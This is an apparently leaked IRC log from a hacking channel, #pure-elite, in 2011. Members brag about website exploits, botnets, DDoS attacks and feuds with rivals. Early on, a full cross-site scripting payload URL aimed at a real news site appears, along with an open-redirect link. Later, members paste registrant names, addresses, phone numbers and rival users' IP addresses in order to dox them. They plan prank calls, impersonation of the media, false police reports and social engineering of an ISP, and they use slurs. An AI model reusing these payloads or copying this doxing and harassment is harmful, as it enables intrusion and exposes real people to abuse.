Sie sind auf Seite 1von 121

**** BEGIN LOGGING AT Tue May 31 11:09:12 2011 **** ENDING LOGGING AT Tue May 31 11:09:55 2011 ****

BEGIN LOGGING AT Tue May 31 11:09:55 2011 May 31 11:12:06 <[redacted]> http://www.billoreilly.com/pg/jsp/help/contactus .jsp?cid=1308195%3C%22%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;ale rt%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888, 83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT% 3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT %3E%22%3E&tid=401 May 31 11:12:37 <[redacted]> delivered :D May 31 11:18:50 * Neuron (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure-el ite May 31 11:18:57 <Neuron> o/ morning! May 31 11:19:30 <[redacted]> hello May 31 11:19:38 <[redacted]> XSS in billoreilly lol May 31 11:19:42 <[redacted]> http://www.billoreilly.com/pg/jsp/help/contactu s.jsp?cid=1308195%3C%22%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;al ert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888 ,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT %3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIP T%3E%22%3E&tid=401 May 31 11:19:50 <[redacted]> also a URL redirection May 31 11:19:51 <[redacted]> http://www.billoreilly.com/site/rd?satype=1&said =313&pos=11&url=http://www.meatspin.com May 31 11:20:31 <Neuron> lmfao May 31 11:20:39 <Neuron> wow you been bizzy May 31 11:21:54 <Neuron> what made you go after billoreilly? May 31 11:22:59 <joepie92> hai Neuron May 31 11:23:02 <Neuron> o/ May 31 11:23:54 <[redacted]> the lulz May 31 11:45:15 * Neuron yawns May 31 11:50:06 <Avunit> Get on the new IRCd; use your login @ http://46. 243.12.9/docs/ to check how to! May 31 11:51:18 * Neuron rages my login info is on my other machine :( Avu nit help a man out? May 31 11:51:28 <Avunit> lol May 31 11:51:31 <Avunit> ill reset your pass May 31 11:51:35 <Avunit> sinc ei cant obviously read it May 31 11:51:45 <Neuron> rgr thanks May 31 11:51:50 <[redacted]> Avunit May 31 11:51:54 <Avunit> yesh May 31 11:51:59 <[redacted]> nvm i still ahve my pass :D May 31 11:52:19 * Avunit has quit (SSL Connection closed) May 31 11:52:40 * Avunit (Avunit@HA-4o8.6s8.srgpum.IP) has joined #pure-el ite May 31 11:52:48 <Avunit> what is this for sorcery D: May 31 11:52:55 <Neuron> XD May 31 11:53:04 * Avunit has quit (Changing host) May 31 11:53:04 * Avunit (Avunit@netadmin.operationfreedom.ru) has joined #pure-elite May 31 11:53:30 <Avunit> Anyway need to move asap, i only havent spoken t o devrandom yet May 31 11:53:44 <Neuron> Avunit: cap_sasl.pl 404 May 31 11:53:59 <Avunit> wut May 31 11:53:59 <Avunit> sec May 31 11:55:55 <Avunit> oh i know xD May 31 11:56:48 <[redacted]> brb

May 31 11:56:54 Python interface unloaded **** ENDING LOGGING AT Tue May 31 11:56:54 2011 **** BEGIN LOGGING AT Tue May 31 11:58:25 2011 May 31 11:58:25 * Now talking on #pure-elite May 31 11:58:25 * Topic for #pure-elite is: [pE] security research and dev elopment. PRIV8!PRIV8!PRIV8! No leaks, no vanity. Everything stays here. wor k with trollpoll on .es targets. MSG him for infos. google search site:gob.es fo r fun May 31 11:58:25 * Topic for #pure-elite set by Sabu!sabu@netadmin.operatio nfreedom.ru at Wed May 25 16:25:57 2011 May 31 11:59:09 <Neuron> Avunit: :( don't like us irssi guys ;( May 31 11:59:14 <Avunit> LOL May 31 11:59:16 <Avunit> sowwie May 31 12:00:54 <Avunit> fixd gimme a sec May 31 12:01:47 <Neuron> rgr May 31 12:02:16 <Avunit> there you go May 31 12:03:17 <Avunit> lighttpd thought you wanted to execute a .pl scr ipt May 31 12:03:22 <Avunit> and was like OH NO YOU DIDNT May 31 12:03:45 <Neuron> XD May 31 12:04:24 <Avunit> so chagned it to .txt :P just save and rename it to cap_sasl.pl May 31 12:05:50 <Neuron> brb May 31 12:05:53 * Neuron has quit (Quit: leaving) May 31 12:06:32 * Avunit has changed the topic to: Get on the new IRCd; us e your login @ http://46.243.12.9/docs/ to check how to! May 31 12:07:01 * Avunit has changed the topic to: Get on the new IRCd; us e your login @ http://46.243.12.9/docs/ to check how to! /join #pure-elite on th e new IRCd! May 31 12:08:09 * Neuron (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure-el ite May 31 12:08:18 <Neuron> irss = /sasl command not find May 31 12:08:52 <Avunit> eek May 31 12:09:00 <Avunit> did you load the script? May 31 12:09:18 <Neuron> let me try again May 31 12:09:23 * Neuron has quit (Quit: leaving) May 31 12:26:36 * Neuron_ (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure-e lite May 31 12:26:42 <Neuron_> Avunit: your script hates backtrack :P May 31 12:26:56 <Avunit> not miens D: May 31 12:27:02 * Topiary has quit (Quit: restarting client) May 31 12:27:47 <Neuron_> brb thrid try May 31 12:27:54 * Neuron_ has quit (Quit: leaving) May 31 12:28:04 * Topiary (t@HA-581.fpm.h7vc0g.IP) has joined #pure-elite May 31 12:50:18 * Neuron (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure-el ite May 31 12:50:22 <Neuron> ... May 31 12:50:26 <Avunit> neuron May 31 12:50:29 <Neuron> giving me connection refused May 31 12:50:31 <Avunit> http://pthree.org/2010/01/31/freenode-ssl-and-sa sl-authentication-with-irssi/ May 31 12:50:41 <Avunit> that means you didnt use the right port or didnt SASL auth May 31 12:51:04 <Neuron> rgr May 31 12:52:17 <Topiary> 9001 or 9002 May 31 12:52:29 <Avunit> 1 = ssl, 2 = NO SSL BIATCH May 31 12:53:10 * Neuron has quit (Quit: leaving) May 31 13:03:05 * Neuron (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure-el

ite May 31 13:03:26 <Neuron> Avunit: lol really quick which password the one you just gave me or the oone for nickserv here.. both hate me equally May 31 13:03:30 <Neuron> :) May 31 13:03:41 <Avunit> the one ig ave you May 31 13:03:51 <Neuron> capital N on Neuron or lowercase/ May 31 13:03:54 <Avunit> capital May 31 13:04:41 <Neuron> back to fighting with it :) May 31 13:07:43 <Neuron> im sure its because im doing something stupid May 31 13:07:46 * Neuron has quit (Quit: leaving) May 31 13:15:00 * Neuron (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure-el ite May 31 13:15:30 <Neuron> Avunit: wanna know what the problem was XD i was naming my network PE in my config.... May 31 13:15:53 <Topiary> happened to me first time May 31 13:16:03 <Topiary> I auth'd to shipyard but named my net freedomsas l May 31 13:21:27 <Neuron> ok was hoping iw asn't the only one :E May 31 15:00:16 <storm> yo May 31 15:17:39 * Disconnected (Remote host closed socket). **** ENDING LOGGING AT Tue May 31 15:17:39 2011 **** BEGIN LOGGING AT Tue May 31 23:51:53 2011 May 31 23:51:53 * Now talking on #pure-elite May 31 23:51:53 * Topic for #pure-elite is: PRIV8. NO LEAKS. RESPECT EACH OTHER. RESEARCH AND EXPLOIT DEV! May 31 23:51:53 * Topic for #pure-elite set by Sabu!sabu@netadmin.operatio nfreedom.ru at Tue May 31 18:48:23 2011 May 31 23:52:05 <Neuron> o/ hey [redacted] May 31 23:52:09 <[redacted]> hello May 31 23:52:11 <[redacted]> did i miss anything? May 31 23:52:16 <Neuron> nothing really May 31 23:52:21 <[redacted]> lot of news coverage May 31 23:52:32 <Neuron> just me and kayla trying to bot 38k or so busybo x's you? May 31 23:53:44 <[redacted]> XD May 31 23:53:46 <[redacted]> nothing at all May 31 23:53:49 <[redacted]> that sounds nice May 31 23:54:18 <Neuron> the most i can do is make a bash script that act s has a irc client and we can issue commands that way Jun 01 01:04:47 * value has quit (Connection closed) Jun 01 01:19:35 * value (value@HA-ao3.bsr.r1bp4m.IP) has joined #pure-elit e Jun 01 01:28:38 * Topiary (t@HA-r9b.fpm.h7vc0g.IP) has joined #pure-elite Jun 01 01:29:53 * Neuron has quit (Ping timeout: 121 seconds) Jun 01 01:32:26 * Neuron (Neuron@HA-l0q.345.a84vd3.IP) has joined #pure-el ite Jun 01 01:39:34 <Recursion> http://i.imgur.com/DsgWI.jpg Jun 01 01:40:10 <Topiary> Ooh that's a much better screencap Jun 01 01:40:14 <Topiary> the one I had earlier was lame Jun 01 01:40:18 <Topiary> oh man it includes the twitter Jun 01 01:40:29 <Topiary> fucking Wall Street Journal printed a twitter na me Jun 01 01:40:32 <Topiary> and a fucking cat in space Jun 01 01:40:40 <Neuron> XD Jun 01 01:41:12 <Neuron> thats epic Jun 01 01:56:12 <joepie92> http://www.nasa.gov/multimedia/nasatv/index.html Jun 01 01:56:29 <joepie92> supposedly a shuttle is going to land Jun 01 01:56:31 <joepie92> or some shit

Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun ou? Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun ill Jun xD Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun Jun

01 01 01 01 01 01 01 01 01 01

01:57:07 01:57:41 01:57:43 02:13:02 02:14:08 02:18:29 02:19:02 02:19:06 02:19:20 02:19:45

<storm> hi <Neuron> lol <Neuron> watching * Topiary has quit (Ping timeout: 121 seconds) * Topiary (t@HA-cin.fpm.h7vc0g.IP) has joined #pure-elite <Topiary> anything exciting on Nasa? <storm> hi Topiary <Topiary> hey storm <storm> sup <Topiary> just woke up, anything exciting happening with y <storm> yeah i just ate bbq <storm> :D <storm> and i just woke up as well * Neuron has quit (Quit: leaving) <Topiary> BBQ for breakfast, mmm <storm> yessir <storm> especially at 222am <storm> xD * lol (lol@HA-r3c.ts4.h3kc47.IP) has joined #pure-elite <lol> hey guys :) <Topiary> hi kayla <storm> ah <storm> so lol is kayla <storm> makes sense <storm> ;x <lol> :D <storm> i should have known with all those faces <lol> lmao <lol> how goes :D? <storm> lols <storm> fine <storm> still looking for an rfi/lfi bot :p <lol> i've got one lol :D with google bypass, if the bypass st <lol> but it's on a USB but i think the USB might be infected

01 02:19:53 01 02:19:54 01 02:20:10 01 02:20:26 01 02:20:38 01 02:22:06 01 02:22:14 01 02:22:17 01 02:23:42 01 02:23:48 01 02:25:16 01 02:25:30 01 02:25:32 01 02:25:35 01 02:25:36 01 02:26:01 01 02:26:03 01 02:26:27 01 02:26:30 01 02:26:34 01 02:26:36 01 02:26:46 01 02:28:30 works xD 01 02:28:52 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 02:29:04 02:31:02 02:31:49 02:31:57 02:33:55 02:33:56 02:34:02 02:34:04 02:34:30 02:36:39 02:36:49 02:37:06 02:37:12 02:37:13 02:38:21 02:38:27 02:38:28 02:38:31 02:38:50 02:39:26 02:39:27 02:39:36 02:43:12

<lol> so im scared to plug it in xD * Topiary has quit (Ping timeout: 121 seconds) <storm> lol <storm> get off windows and nothing is ever infected! <joepie92> it r landing nao <joepie92> I believe <joepie92> http://www.ustream.tv/nasahdtv <joepie92> :P <joepie92> also, storm, kayla is rather recognizable :P <storm> orly? <joepie92> yarly <joepie92> I recall one line from lol being quoted <joepie92> and I was liek ohey dats kayla <joepie92> lol <joepie92> also <joepie92> landed spaceshuttle has landed <joepie92> :P * Topiary (t@HA-tic.fpm.h7vc0g.IP) has joined #pure-elite <Topiary> hey storm, did you shit on 2600 again earlier? <lol> apparnently they want more :o <lol> :D <Topiary> more you say <lol> moooooooooooooooooooooooooooooooooooooooooooore

Jun 01 02:43:23 <Topiary> my connection is being a dick Jun 01 02:43:26 <Topiary> I think it's the weather Jun 01 02:43:48 <storm> yesh Jun 01 02:43:50 <storm> i did Jun 01 02:43:53 <storm> wy? Jun 01 02:43:55 <storm> why?* Jun 01 02:44:14 <storm> i brought madjack down to like 17 users or something Jun 01 02:44:25 <lol> lol Jun 01 02:44:34 <storm> as well as collective Jun 01 02:44:39 <storm> ;P Jun 01 02:45:05 <Topiary> heh they mad Jun 01 02:45:56 <storm> howso Jun 01 02:46:13 <Topiary> well Overlord Mighty Jester himself was tweeting at us Jun 01 02:46:16 <Topiary> calling us failures :( Jun 01 02:46:28 <lol> lol Jun 01 02:47:10 <storm> lmfao Jun 01 02:47:13 <storm> where Jun 01 02:47:16 <storm> link a nig Jun 01 02:48:00 <lol> https://twitter.com/#!/th3j35t3r Jun 01 02:48:04 <Topiary> ^ Jun 01 02:48:05 <lol> tht is t35t3r Jun 01 02:48:18 <lol> tbh he needs owning :D Jun 01 02:48:26 <Topiary> he's needed owning for a long time indeed Jun 01 02:48:38 <Topiary> you gotta love it though Jun 01 02:48:49 <Topiary> his little fortress with his minions, his DoS to ol and his blog Jun 01 02:48:54 <Topiary> his world must be so small Jun 01 02:49:03 <storm> @anonakomis, @lulzsec, whatever, whoever. I AM BUSY. So how bout ya fuck off? Show some grace at least. R WE DONE YET? Jun 01 02:49:04 <storm> rofl Jun 01 02:49:20 <Topiary> storm: this is the dude that claims to have DDoS 'd WikiLeaks Jun 01 02:49:30 <storm> nice Jun 01 02:49:38 <Topiary> speaking of, did you guys know WikiLeaks tweeted our PBS Tupac story? Jun 01 02:49:46 <storm> yes Jun 01 02:49:48 <storm> i was around Jun 01 02:49:49 <storm> :) Jun 01 02:51:03 <storm> this guy has a lot of crying posts Jun 01 02:52:33 <Topiary> aye he's a barrel of joy Jun 01 02:52:56 <storm> awinee Awinee Jun 01 02:52:56 <storm> @ Jun 01 02:52:56 <storm> @maxxmac1 @LulzSec my loic broke so i stopped for the ni ght. Happy playing Jun 01 02:53:15 <storm> is that the windows dos tool he showed to cameras? Jun 01 02:53:36 <Topiary> that was HOIC, he fired it at his own government from his home IP Jun 01 02:53:41 <Topiary> to "test" it Jun 01 02:53:49 <storm> lmfao Jun 01 02:53:58 <storm> terrible Jun 01 02:54:03 <Topiary> Jester's DoS tool = Apache 0day + slowloris + To r Jun 01 02:54:17 <storm> my dos tool is over ten years old and at least it spoofs Jun 01 02:54:28 <storm> ;p Jun 01 02:54:36 <Topiary> naturally you are a sexy beast Jun 01 02:54:41 <storm> :D Jun 01 02:55:55 <Topiary> tl;dr on awinee - he's insanely lonely/ugly so e ven treats our mockery as a sign of attention Jun 01 02:56:09 <storm> hahaha

Jun 01 02:56:16 <Topiary> tl;dr on Jester - pompous elitism-fueling blogge r with Tor Jun 01 02:56:21 <Topiary> tl;dr on the rest of them - sheep Jun 01 02:56:58 <storm> i use tor to ssh out ;d does theeze make me leet? Jun 01 02:57:16 <Topiary> yes it does Jun 01 02:57:37 <lol> no it makes you a ver patient person :O Jun 01 02:57:46 <lol> SSH over TOR is looooooooooooooooooow xD Jun 01 02:57:52 <lol> very* Jun 01 02:58:00 <storm> rofl Jun 01 02:58:00 <storm> dude Jun 01 02:58:02 <storm> i agree Jun 01 02:58:06 <storm> tor is slow as balls Jun 01 02:58:10 <storm> btw Jun 01 02:58:12 <storm> FailSec? Jun 01 02:58:15 <storm> wtf is this shit Jun 01 02:58:21 <Topiary> storm, we've had stalkers like that for months Jun 01 02:58:24 <Topiary> they follow us everywhere we go Jun 01 02:58:27 <Topiary> they monitor everything we do Jun 01 02:58:31 <Topiary> they make parodies of all our accounts Jun 01 02:58:33 <Topiary> we're kind of like a rock band Jun 01 02:58:36 <Topiary> as someone put it Jun 01 02:58:53 <storm> lmfao Jun 01 02:59:27 <lol> it's got tht bad attentions seeking Adrian lamo wen't an d reg'd lulzsec.com proberbly so onw day somone whois it out of curiosity and se es his name so he can get a mention lol Jun 01 02:59:41 <lol> even on his site, he had links to google searches of him self Jun 01 02:59:46 <Topiary> guys did you see Adrien tweeted us insulting shi t? Jun 01 02:59:54 <storm> well Jun 01 02:59:58 <storm> i can get you guys Jun 01 02:59:58 <lol> i dont think he's ever hacked anything Jun 01 03:00:02 <storm> lulsec.lulz.net Jun 01 03:00:10 <storm> or sec.lulz.net Jun 01 03:00:11 <storm> or whatever Jun 01 03:00:22 <Topiary> we're working on a website at the moment Jun 01 03:00:28 <Topiary> 'sides we already has haz.lulz.net Jun 01 03:00:41 <Topiary> I will show you the design for the site so far Jun 01 03:00:46 <storm> you have access to lulz.net? Jun 01 03:00:53 <storm> my friend owns it >: Jun 01 03:01:15 <[redacted]> lulz.net is ran by furrys Jun 01 03:01:18 <[redacted]> yiff in hell Jun 01 03:01:18 <[redacted]> :] Jun 01 03:01:45 <Topiary> http://i.imgur.com/dFaz0.jpg banner at the top l inks to whatever, rest is just background (including rainbow) Jun 01 03:01:45 <storm> wat Jun 01 03:01:49 <Topiary> it's in progress etc Jun 01 03:01:53 <lol> im a furry im sat here in my fur suit :D Jun 01 03:02:02 <[redacted]> oh you troll :D Jun 01 03:02:37 <storm> FailSec The Fail Boat Jun 01 03:02:37 <storm> @ Jun 01 03:02:37 <storm> @awinee @LulzSec so ok i ran this thing but nothing happ ened, wth chinese pirates are killing my cuban refugees! Jun 01 03:02:43 <storm> is he talking about my ddoses? Jun 01 03:02:48 <storm> cause i hit from chinese boxes Jun 01 03:02:50 <storm> lol Jun 01 03:03:15 <Topiary> nah they don't know where China is on the map Jun 01 03:03:18 <Topiary> let alone what a box is Jun 01 03:03:20 <storm> probably looks like a botnet of china residentals Jun 01 03:03:33 <storm> ahh

Jun 01 03:06:02 <storm> i guess i put too much credit in people Jun 01 03:06:19 <lol> i say we just root 2600 and sniff their IRCD for a few m onth Jun 01 03:06:47 <Topiary> easier said than don-- wait, you're kayla :x Jun 01 03:06:54 <Topiary> easier done than said in that case Jun 01 03:06:57 <storm> i want an apache 0day >: sniff the fk out of them Jun 01 03:06:58 <joepie92> Topiary Jun 01 03:07:05 <joepie92> do you has any more screenshots of site design? Jun 01 03:07:16 <Topiary> not really Jun 01 03:07:17 <Topiary> why? Jun 01 03:07:53 <joepie92> because I'm curious :P Jun 01 03:08:49 <Topiary> only has this other one: http://i.imgur.com/3WpE q.jpg Jun 01 03:08:54 <Topiary> where the rainbow chills behind and the border i s gone Jun 01 03:08:55 <joepie92> what the shit - adrian lamo registered lulzsec.c om? Jun 01 03:09:16 <joepie92> also, Topiary, make the rainbow overlay the page content :3 Jun 01 03:09:32 * devrandom (devrandom@HA-cgq.t9g.4u7qps.IP) has joined #p ure-elite Jun 01 03:09:52 <Topiary> indeed joepie Jun 01 03:09:58 <devrandom> hello folks Jun 01 03:10:09 <lol> hey :D Jun 01 03:10:16 <Topiary> and yes he did Jun 01 03:10:19 <Topiary> http://whois.domaintools.com/lulzsec.com Jun 01 03:10:48 <lol> im telling you :D Jun 01 03:10:52 <lol> it's cos he's an attention seeker Jun 01 03:10:54 <devrandom> sorry i haven't been in much ... got a new machi ne, been working on vm shite Jun 01 03:10:58 <lol> it's so someone whois it Jun 01 03:11:01 <lol> and sees his name Jun 01 03:11:05 <lol> so he gets a mention Jun 01 03:11:06 <lol> lol Jun 01 03:11:15 <lol> really do hate ppl like that Jun 01 03:11:52 <lol> he's never hacked anything, he sat out side of some buil ding cracked their wifi and then went and told them so he could get arrested and get a mention lol Jun 01 03:11:54 <lol> wtf Jun 01 03:11:54 <Topiary> the world would be a better place without 2600 ; x Jun 01 03:12:04 <lol> he has links to google searchs of himself Jun 01 03:12:12 <lol> he really, really is lonely Jun 01 03:12:43 <storm> so are they a target aside from just packeting? Jun 01 03:12:59 <lol> they are complete fair game :) Jun 01 03:13:15 <lol> the j3st3rs dox would be nice :) Jun 01 03:13:18 <Topiary> well A) they are a bunch of asshats, B) Jester i s a fucktard who *everyone* would want to destroy, C) Apache 0day, D) Adrian nee ds a spanking Jun 01 03:13:29 <joepie92> E) bring the lulz Jun 01 03:13:30 <joepie92> :D Jun 01 03:13:35 <Topiary> yes, that too Jun 01 03:14:44 <Topiary> ah wait that was Adrian Chen sending us those in sulting tweets Jun 01 03:14:47 <Topiary> both losers Jun 01 03:15:14 <storm> i like C most of all Jun 01 03:15:15 <storm> ;x Jun 01 03:15:17 <Topiary> he tried to arrange an interview with LulzSec, t old him to fuck off before Gawker gets rooted Jun 01 03:15:26 <Topiary> then he tweets us saying PBS hack was stupid

Jun 01 03:15:36 <lol> isn't tht apache 0day pub yet? Jun 01 03:15:37 <Topiary> cuts deep :( Jun 01 03:16:26 <storm> well if it were public it wouldnt be a 0day anymore Jun 01 03:16:27 <storm> ;x Jun 01 03:16:34 <lol> tru :o Jun 01 03:18:03 <Topiary> (Jester's flavour of choice is Ubuntu, FYI) Jun 01 03:18:18 <lol> NS History: Jun 01 03:18:18 <lol> 1 change on 2 unique name servers over 0 year. Jun 01 03:18:18 <lol> Reverse IP: Jun 01 03:18:18 <lol> 164,461 other sites hosted on this server. Jun 01 03:18:18 <lol> Log In or Create a FREE account to start monitoring this domain name Jun 01 03:18:18 <lol> DomainTools for Windows Jun 01 03:18:18 <lol> Now you can access domain ownership records anytime, any where... right from your own desktop! Download Now> Jun 01 03:18:18 <lol> Domain Name: lulzsec.com Jun 01 03:18:18 <lol> Registrant Contact: Jun 01 03:18:18 <lol> Adrian Lamo Jun 01 03:18:18 <lol> LulzSec LLC Jun 01 03:18:18 <lol> 108 WEST 13TH STREET Jun 01 03:18:19 <lol> Wilmington, Delaware 19801-1145 Jun 01 03:18:20 <lol> US Jun 01 03:18:21 <lol> +1.8889201981 Jun 01 03:18:53 <lol> do you think he's tht much of an attention seeker to use his real address? Jun 01 03:19:05 <Topiary> we could always call his ass Jun 01 03:19:08 <lol> can someone in the US phone tht number and see if it's r eally him? Jun 01 03:19:12 <Topiary> I'll call him Jun 01 03:19:32 <lol> if so i'll do some ic3 requests as him being the leader of luzsec, he owns the domain afterall Jun 01 03:19:41 <joepie92> >LulzSec LLC Jun 01 03:19:42 <lol> :D Jun 01 03:19:47 <Topiary> what does he sound like? Jun 01 03:20:02 <lol> a looser Jun 01 03:20:04 <lol> xD Jun 01 03:20:10 <lol> just say you are media Jun 01 03:20:14 <lol> and you found the domain Jun 01 03:20:20 <lol> and you'd like to interview him Jun 01 03:20:27 <lol> feed his need for attention Jun 01 03:20:30 <lol> :D Jun 01 03:20:30 <joepie92> big potential for lulz is big Jun 01 03:20:54 <lol> yes :D Jun 01 03:20:57 <Topiary> calling him now Jun 01 03:21:00 <Topiary> ringring Jun 01 03:21:05 <joepie92> Topiary Jun 01 03:21:06 <joepie92> skype Jun 01 03:21:06 <storm> at 3am lol Jun 01 03:21:06 <joepie92> :( Jun 01 03:21:08 <joepie92> and tinychat Jun 01 03:21:09 <lol> :3 Jun 01 03:21:16 <storm> i agree @ skype Jun 01 03:21:16 <storm> ;x Jun 01 03:21:22 <Topiary> he's not there, AT&T virtual blahblahblah not av ailable Jun 01 03:21:26 <joepie92> lol Jun 01 03:21:33 <joepie92> AT&T :o Jun 01 03:21:42 <joepie92> didn't we have some... AT&T noms? Jun 01 03:21:50 <lol> yes :D Jun 01 03:22:06 <lol> i think it was only their buisnuiess stuff?

Jun 01 03:22:09 <joepie92> ye Jun 01 03:22:09 <joepie92> well Jun 01 03:22:16 <joepie92> it wouldnt surprise me Jun 01 03:22:20 <joepie92> if Lamo had a business acct Jun 01 03:22:42 <joepie92> Topiary. Jun 01 03:22:47 <joepie92> someone thinks Avunit is you Jun 01 03:22:54 <Topiary> someone thinks everyone is me Jun 01 03:22:59 <joepie92> lol Jun 01 03:23:04 <storm> I am Topiary Jun 01 03:23:06 <joepie92> http://anons.wikia.com/wiki/Topiary Jun 01 03:23:07 <lol> even im Topiary :D Jun 01 03:23:11 <storm> ^ Jun 01 03:23:12 <Topiary> goddamnit what the fuck is that Jun 01 03:23:13 <storm> I'm lol too Jun 01 03:23:15 <joepie92> Aliases Jun 01 03:23:16 <joepie92> Topiary, AVUnit, Whirlpool Jun 01 03:23:18 <storm> ;d Jun 01 03:23:23 <lol> this entire channel is Topiary talking to himself :D Jun 01 03:23:28 <joepie92> also Jun 01 03:23:30 <joepie92> that is a wiki Jun 01 03:23:32 <joepie92> with tinychat screencaps Jun 01 03:23:44 <joepie92> and small amounts of dox Jun 01 03:23:44 <lol> screen sessions, screen sessions everywhere Jun 01 03:24:10 <Topiary> attributes: cautious Jun 01 03:24:15 <Topiary> what-does-it-mean.avi Jun 01 03:24:28 <joepie92> lol Jun 01 03:24:29 <joepie92> so Jun 01 03:24:32 <joepie92> what I am wondering about Jun 01 03:24:40 <joepie92> is why "Homosexual" is not just in the Attribute s template Jun 01 03:24:48 <joepie92> as 99% of the tinychatfags seems to fit that des cription Jun 01 03:25:07 <Topiary> "frequently makes prank calls" Jun 01 03:25:13 <Topiary> I went on TinyChat one night and did them :( Jun 01 03:25:19 <Topiary> these guys have done their research!!11 Jun 01 03:25:22 <joepie92> lol Jun 01 03:25:24 <lol> we need to pwn a media/mews company and offer j35t3r an interview see if he bites, see what we can extract out of him? Jun 01 03:25:41 <lol> pose as media Jun 01 03:25:43 <lol> :D Jun 01 03:26:00 <storm> kayla 4 prez Jun 01 03:26:51 <Topiary> this is worse than the time some faggot did this Jun 01 03:26:52 <Topiary> http://en.wikipedia.org/wiki/Topiary_%28hacktivi st%29 Jun 01 03:26:57 <Topiary> can we delete this somehow? Jun 01 03:27:21 <joepie92> interesting.... the guy who made the wikia one i s using anonine Jun 01 03:27:27 <lol> It's worth noting that he has a particular fondness for bitcoins, and is likely the one who manages the bitcoin donations to LulzSec. Jun 01 03:27:30 <storm> Not much is known about Corey, except that he uses a voi ce changer on TinyChat to deepen his voice and the he will incessantly ask to se e men's genitals while trying to engage them in the webcam equivalent of phone s ex. He seems to be particularly interested in Topiary. Jun 01 03:27:32 <storm> ROFLMFAO Jun 01 03:27:38 <joepie92> and Topiary, you can always play the notability cad Jun 01 03:27:39 <joepie92> card* Jun 01 03:27:57 <joepie92> if you sound convinced enough that you're not no table Jun 01 03:28:00 <joepie92> wikipedo's will remove anything

Jun 01 03:28:15 <joepie92> storm: fun thing is that's coreys actual voice Jun 01 03:28:15 <joepie92> lol Jun 01 03:28:20 <joepie92> :D Jun 01 03:28:22 * joepie92 lulz Jun 01 03:28:25 <storm> xD Jun 01 03:28:29 <Topiary> who made this Wiki? Jun 01 03:28:36 <Topiary> because all their facts come from lurking in Tin yChat for one night Jun 01 03:28:59 * devrandom has quit (Quit: leaving) Jun 01 03:29:11 <lol> awinee was braggin about being in a tiny chat on his twi tter lol Jun 01 03:29:18 <joepie92> HA Jun 01 03:29:19 <Topiary> yeah he was Jun 01 03:29:20 <joepie92> FUCKING MORON Jun 01 03:29:20 <joepie92> http://anons.wikia.com/wiki/Special:Contribution s/76.106.247.143 Jun 01 03:29:22 <joepie92> HAHAHAHA Jun 01 03:29:28 <joepie92> c-76-106-247-143.hsd1.fl.comcast.net Jun 01 03:29:31 <joepie92> nice vpn bro Jun 01 03:29:34 <lol> proberbly him, someone shuld include his dox on tht wiki page as supreme anonymous leader Jun 01 03:29:35 <Topiary> sec Jun 01 03:29:52 <lol> lol deffinetly not VPN :D Jun 01 03:29:57 <lol> someone social tht ISP Jun 01 03:29:58 <lol> :D Jun 01 03:30:12 <joepie92> other person uses anonine Jun 01 03:30:24 <joepie92> so I guess it's time for some user searching on anonops Jun 01 03:30:25 <joepie92> :D Jun 01 03:30:39 <Topiary> * Asherah (Asherah@93-94-245-147.dynamic.swissvp n.net) Jun 01 03:30:39 <Topiary> asherah_ is Asherah@74.115.212.38 * Asherah Jun 01 03:30:39 <Topiary> * amob (~amob@pool-71-191-255-116.washdc.fios.ve rizon.net) Jun 01 03:30:39 <Topiary> * Cephurs (~wtf@pool-71-126-168-162.washdc.fios. verizon.net) Jun 01 03:30:39 <Topiary> cephurs was ~ching@LCaen-156-54-21-76.w80-11.abo .wanadoo.fr * ... Jun 01 03:30:39 <Topiary> cephurs was ~ching@85.17.254.135 * ... Jun 01 03:30:43 <Topiary> cephurs was ~ching@rainbowwarrior.torservers.net * ... Jun 01 03:30:45 <lol> fuck if it was road runner i know someone who can fully dox IP -> address name everything Jun 01 03:30:45 <Topiary> * T71 (T71@66-168-112-216.dhcp.oxfr.ma.charter.c om) has joined #jester Jun 01 03:30:47 <Topiary> === bluesoul120 <~bluesoul@46.20.33.115> ``blues oul'' Jun 01 03:30:49 <Topiary> bluesoul120 is ~bluesoul@178.86.6.11 * bluesoul Jun 01 03:30:51 <Topiary> godbert (~godbert@c-98-250-11-251.hsd1.mi.comcas t.net) has joined #jester Jun 01 03:30:53 <Topiary> godbert was ~godbert@cpe-68-173-45-234.nyc.res.r r.com * juevos rancheros Jun 01 03:30:55 <Topiary> Matches? Jun 01 03:31:24 <joepie92> 173.244.215.65.static.midphase.com Jun 01 03:31:40 <lol> c-76-106-247-143.hsd1.fl.comcast.net Jun 01 03:31:40 <lol> is flordia? Jun 01 03:31:42 <joepie92> let me get the other ips Jun 01 03:31:42 <joepie92> ya Jun 01 03:31:48 <storm> i'm in florida Jun 01 03:31:50 <storm> :O

